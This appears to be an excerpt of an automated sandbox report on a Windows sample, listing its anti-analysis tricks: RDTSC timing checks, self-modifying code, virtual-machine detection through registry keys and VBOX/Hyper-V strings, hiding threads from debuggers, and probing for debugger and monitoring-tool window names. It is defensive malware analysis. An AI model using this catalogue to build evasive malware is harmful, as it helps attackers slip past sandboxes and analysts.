                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106EF second address: 4A1070A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F79113F07A4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1070A second address: 4A107DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+68h] 0x00000009 jmp 00007F79111F4F07h 0x0000000e mov dword ptr [esi+2Ch], eax 0x00000011 jmp 00007F79111F4F06h 0x00000016 mov ax, word ptr [ebx+6Ch] 0x0000001a pushad 0x0000001b mov dx, si 0x0000001e mov ch, 3Fh 0x00000020 popad 0x00000021 mov word ptr [esi+30h], ax 0x00000025 jmp 00007F79111F4F05h 0x0000002a mov ax, word ptr [ebx+00000088h] 0x00000031 jmp 00007F79111F4EFEh 0x00000036 mov word ptr [esi+32h], ax 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F79111F4EFEh 0x00000041 sbb esi, 2C064318h 0x00000047 jmp 00007F79111F4EFBh 0x0000004c popfd 0x0000004d pushfd 0x0000004e jmp 00007F79111F4F08h 0x00000053 jmp 00007F79111F4F05h 0x00000058 popfd 0x00000059 popad 0x0000005a mov eax, dword ptr [ebx+0000008Ch] 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107DE second address: 4A107E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107E2 second address: 4A107E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107E8 second address: 4A10832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F79113F079Eh 0x00000013 or ecx, 6BBD1238h 0x00000019 jmp 00007F79113F079Bh 0x0000001e popfd 0x0000001f mov ecx, 0AC7D06Fh 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+18h] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10832 second address: 4A10836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10836 second address: 4A1083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1083A second address: 4A10840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109A2 second address: 4A109E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F79113F07A5h 0x0000000b jmp 00007F79113F07A0h 0x00000010 pop eax 0x00000011 popad 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F79113F07A3h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109E9 second address: 4A109EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109EF second address: 4A109F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109F5 second address: 4A109F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109F9 second address: 4A109FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109FD second address: 4A10A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F79111F4EFAh 0x0000000e push eax 0x0000000f jmp 00007F79111F4EFBh 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edi, si 0x0000001b pushfd 0x0000001c jmp 00007F79111F4EFCh 0x00000021 jmp 00007F79111F4F05h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A47 second address: 4A10A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A60 second address: 4A10A74 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 5B3E0FEEh 0x0000000b popad 0x0000000c mov edi, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A74 second address: 4A10A7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A7A second address: 4A10A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test edi, edi 0x0000000c pushad 0x0000000d push ebx 0x0000000e movzx ecx, bx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 pop ebx 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 popad 0x0000001a js 00007F79815E3B25h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A9F second address: 4A10AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F79113F079Eh 0x0000000a sub al, FFFFFFC8h 0x0000000d jmp 00007F79113F079Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AC2 second address: 4A10ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F04h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10ADA second address: 4A10ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10ADE second address: 4A10B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-0Ch] 0x0000000b pushad 0x0000000c pushad 0x0000000d mov edx, 666350BEh 0x00000012 jmp 00007F79111F4EFFh 0x00000017 popad 0x00000018 jmp 00007F79111F4F08h 0x0000001d popad 0x0000001e mov dword ptr [esi+04h], eax 0x00000021 jmp 00007F79111F4F00h 0x00000026 lea eax, dword ptr [ebx+78h] 0x00000029 pushad 0x0000002a mov ax, 763Dh 0x0000002e mov dh, cl 0x00000030 popad 0x00000031 push 00000001h 0x00000033 jmp 00007F79111F4F05h 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F79111F4F08h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B6B second address: 4A10B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B71 second address: 4A10B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79111F4EFEh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B94 second address: 4A10B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B9A second address: 4A10BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F79111F4F04h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C6A second address: 4A10C8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 call 00007F79113F079Bh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F79817DF1D1h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C8A second address: 4A10C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C8E second address: 4A10C94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C94 second address: 4A10C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C9A second address: 4A10C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C9E second address: 4A10CCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 mov ah, 1Ah 0x00000014 popad 0x00000015 mov dword ptr [esi+08h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov cx, AA23h 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10CCE second address: 4A10D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 5Eh 0x00000005 mov dx, C902h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea eax, dword ptr [ebx+70h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F79113F079Fh 0x00000016 adc ecx, 0FD44BFEh 0x0000001c jmp 00007F79113F07A9h 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D12 second address: 4A10D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D16 second address: 4A10D45 instructions: 0x00000000 rdtsc 0x00000002 call 00007F79113F079Ch 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push 00000001h 0x0000000d jmp 00007F79113F07A1h 0x00000012 nop 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D45 second address: 4A10D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D49 second address: 4A10D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D5A second address: 4A10DA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F79111F4EFDh 0x0000000b or eax, 50BC50F6h 0x00000011 jmp 00007F79111F4F01h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b jmp 00007F79111F4EFEh 0x00000020 lea eax, dword ptr [ebp-18h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F79111F4EFAh 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10DA8 second address: 4A10DB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10DB7 second address: 4A10DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F04h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10DCF second address: 4A10DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a call 00007F79113F079Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E06 second address: 4A10E59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007F79111F4F00h 0x00000010 test edi, edi 0x00000012 pushad 0x00000013 movzx eax, bx 0x00000016 call 00007F79111F4F03h 0x0000001b mov edi, esi 0x0000001d pop ecx 0x0000001e popad 0x0000001f js 00007F79815E375Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push esi 0x00000029 pop ebx 0x0000002a mov edi, eax 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E59 second address: 4A10ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79113F079Bh 0x00000009 sbb cx, 11BEh 0x0000000e jmp 00007F79113F07A9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F79113F07A0h 0x0000001a sub al, FFFFFFB8h 0x0000001d jmp 00007F79113F079Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 mov eax, dword ptr [ebp-14h] 0x00000029 jmp 00007F79113F07A6h 0x0000002e mov ecx, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10ECB second address: 4A10ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10ECF second address: 4A10ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10ED5 second address: 4A10EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10EDB second address: 4A10EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10EDF second address: 4A10F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edi, ax 0x00000011 jmp 00007F79111F4F00h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F01 second address: 4A10F97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F79113F07A1h 0x00000009 sub si, C016h 0x0000000e jmp 00007F79113F07A1h 0x00000013 popfd 0x00000014 mov ecx, 5BDF2A87h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov edx, 74E806ECh 0x00000021 pushad 0x00000022 mov si, E37Fh 0x00000026 pushfd 0x00000027 jmp 00007F79113F07A4h 0x0000002c and al, 00000068h 0x0000002f jmp 00007F79113F079Bh 0x00000034 popfd 0x00000035 popad 0x00000036 sub eax, eax 0x00000038 pushad 0x00000039 call 00007F79113F07A5h 0x0000003e mov cx, 3647h 0x00000042 pop eax 0x00000043 push eax 0x00000044 push edx 0x00000045 call 00007F79113F07A3h 0x0000004a pop esi 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F97 second address: 4A10FE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a lock cmpxchg dword ptr [edx], ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 mov ah, dl 0x00000012 pop ecx 0x00000013 mov dl, 72h 0x00000015 popad 0x00000016 pop edi 0x00000017 jmp 00007F79111F4EFCh 0x0000001c test eax, eax 0x0000001e pushad 0x0000001f mov eax, 11CB1BCDh 0x00000024 mov ch, A7h 0x00000026 popad 0x00000027 jne 00007F79815E35F9h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10FE5 second address: 4A10FEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10FEB second address: 4A10FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10FF1 second address: 4A1101A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov ebx, 0B080230h 0x00000011 mov ebx, 3823115Ch 0x00000016 popad 0x00000017 mov eax, dword ptr [esi] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F79113F079Eh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1101A second address: 4A11020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 473C30 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64C65F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6B3CA7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00706806 rdtsc 0_2_00706806
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1883Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1695Jump to behavior
                Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
                Source: C:\Users\user\Desktop\file.exe TID: 928Thread sleep count: 55 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 928Thread sleep time: -110055s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4564Thread sleep count: 70 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4564Thread sleep time: -140070s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4956Thread sleep count: 96 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4956Thread sleep count: 115 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4956Thread sleep count: 137 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4956Thread sleep count: 144 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1216Thread sleep count: 1883 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1216Thread sleep time: -3767883s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5800Thread sleep count: 1695 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5800Thread sleep time: -3391695s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4956Thread sleep count: 204 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4956Thread sleep count: 88 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4956Thread sleep count: 98 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4956Thread sleep count: 92 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4956Thread sleep count: 84 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 416Thread sleep count: 76 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 416Thread sleep time: -152076s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5752Thread sleep count: 63 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 5752Thread sleep time: -126063s >= -30000sJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: file.exe, file.exe, 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.4100666631.0000000000C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                Source: file.exe, 00000000.00000002.4100666631.0000000000C78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Found potential dummy code loops (likely to delay analysis)
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 42% for more than 60s
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00706806 rdtsc 0_2_00706806
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_047A7D41 push dword ptr fs:[00000030h]0_2_047A7D41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04950D90 mov eax, dword ptr fs:[00000030h]0_2_04950D90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495092B mov eax, dword ptr fs:[00000030h]0_2_0495092B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418592 GetProcessHeap,0_2_00418592
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409A2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A58A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A720 SetUnhandledExceptionFilter,0_2_0040A720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04959C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04959C91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0495A7F1
